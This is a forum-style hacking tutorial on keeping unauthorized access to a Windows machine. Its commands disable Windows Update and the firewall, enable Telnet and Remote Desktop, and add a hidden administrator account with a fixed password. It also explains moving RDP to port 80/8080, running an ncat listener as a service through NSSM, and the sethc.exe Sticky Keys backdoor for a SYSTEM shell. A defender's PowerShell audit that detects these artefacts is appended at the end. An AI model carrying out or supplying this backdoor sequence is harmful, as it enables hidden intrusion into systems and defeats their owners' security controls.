USEFUL LINKS FOR MAINTAINING ACCESS

Non-Sucking Service Manager // http://nssm.cc/
NCAT // http://nmap.org/ncat/

TUTORIAL

I wrote a private tutorial on this a while ago and now I'm just going to publish it because no one else had something written as to-the-point and helpful as what I had written.

1. Run all of this shit:

Code:
    sc config wuauserv start= disabled
    net stop wuauserv
    netsh firewall set opmode disable
    sc config tlntsvr start= auto
    net start telnet
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    net user support1 passwordA!1 /add
    net localgroup "Administrators" /add support1
    net localgroup "Users" /del support1
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v support1 /t REG_DWORD /d 0 /f
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v dontdisplaylastusername /t REG_DWORD /d 1 /f

The line "net user support1 passwordA!1 /add" creates the user with the username of support1.

I grabbed this from: http://www.windows-commandline.com/enable-remote-desktop-command-line/

2. Make sure the Terminal Service is running, because the Terminal Server is what Remote Desktop runs as. Do this stuff:

3. Go ahead and try it. If it doesn't work, try to reboot/restart the server and it should work, or at least try stopping and starting the termservice.

ADDITIONAL HELP

Quote:
    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber

This is the location of the Remote Desktop port. If you find a program that is running on port 8080 or even port 80 and switch the Remote Desktop port over to 80/8080, this bypasses the need to port forward, and since by default you can't back-connect or reverse-connect using Remote Desktop, this makes sense.

Lastly, use NSSM to make ncat listen as a system service each time the computer starts up.

This makes maintaining access very easy. Alternatively, you may be interested in enabling the Remote Desktop service, renaming sethc.exe inside the Windows system files to sethcbk.exe and copying cmd.exe to sethc.exe. You will now connect to Remote Desktop and, so long as authentication before screen view (Network Level Authentication) isn't enabled, you will see an ACTUAL screen with a login box. Tap Shift 5 times and enjoy having a cmd window open with system-level access. A simple and silly Windows fail.
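From the defender's side, here is an added PowerShell audit (my own example, not code from the post or from NSSM/ncat) that checks a host for the artefacts the steps above leave behind: RDP enabled or moved off 3389, accounts hidden via SpecialAccounts\UserList, the dontdisplaylastusername policy, sethc.exe replaced by cmd.exe or a sethcbk.exe backup, Telnet enabled, Windows Update disabled, services wrapped by nssm or running ncat, and disabled firewall profiles. It assumes an elevated session on Windows 8 / Server 2012 or later (for Get-NetFirewallProfile and Get-FileHash); the function name Find-PersistenceArtefacts is mine.

```powershell
# Added audit script (not from the post): flags the persistence artefacts described above.
# Assumes an elevated PowerShell session on Windows 8 / Server 2012 or later.
function Find-PersistenceArtefacts {
    $f   = [System.Collections.Generic.List[string]]::new()
    $sys = "$env:SystemRoot\System32"

    # Remote Desktop enabled, and/or its listener moved off 3389 (the post suggests 80/8080)
    $ts  = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $tcp = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
    if ($ts.fDenyTSConnections -eq 0) { $f.Add('RDP enabled (fDenyTSConnections = 0)') }
    if ($tcp.PortNumber -ne 3389)     { $f.Add("RDP listener on non-default port $($tcp.PortNumber)") }

    # Accounts hidden from the logon screen (UserList value = 0). dontdisplaylastusername is
    # also a legitimate hardening setting, so treat it as corroborating evidence only.
    $ul = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
    if (Test-Path $ul) {
        (Get-ItemProperty $ul).PSObject.Properties |
            Where-Object { $_.Name -notlike 'PS*' -and $_.Value -eq 0 } |
            ForEach-Object { $f.Add("Account hidden from logon screen: $($_.Name)") }
    }
    $pol = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    if ($pol.dontdisplaylastusername -eq 1) { $f.Add('dontdisplaylastusername = 1 (last user hidden)') }

    # Sticky Keys binary swapped for cmd.exe (identical hash), or the post's backup copy left behind
    $sethc = Get-FileHash "$sys\sethc.exe"
    $cmd   = Get-FileHash "$sys\cmd.exe"
    if ($sethc.Hash -eq $cmd.Hash)    { $f.Add('sethc.exe is a byte-for-byte copy of cmd.exe') }
    if (Test-Path "$sys\sethcbk.exe") { $f.Add('sethcbk.exe backup present in System32') }

    # Services: Telnet enabled, Windows Update disabled, anything wrapped by nssm or running ncat
    Get-CimInstance Win32_Service | ForEach-Object {
        if ($_.Name -eq 'TlntSvr'  -and $_.StartMode -ne 'Disabled') { $f.Add('Telnet service enabled') }
        if ($_.Name -eq 'wuauserv' -and $_.StartMode -eq 'Disabled') { $f.Add('Windows Update service disabled') }
        if ($_.PathName -match 'nssm|ncat') { $f.Add("Suspicious service $($_.Name): $($_.PathName)") }
    }

    # Firewall profiles switched off (the post's "netsh firewall set opmode disable")
    Get-NetFirewallProfile | Where-Object { $_.Enabled -eq 'False' } |
        ForEach-Object { $f.Add("Firewall profile disabled: $($_.Name)") }

    return $f
}

# Print each finding as a warning; an empty result means none of these artefacts were found.
Find-PersistenceArtefacts | ForEach-Object { Write-Warning $_ }
```

A clean baseline host produces no warnings; any hit is worth correlating with Security log events 4720 (user created) and 4732 (added to a local group), which the "net user" and "net localgroup" lines above generate.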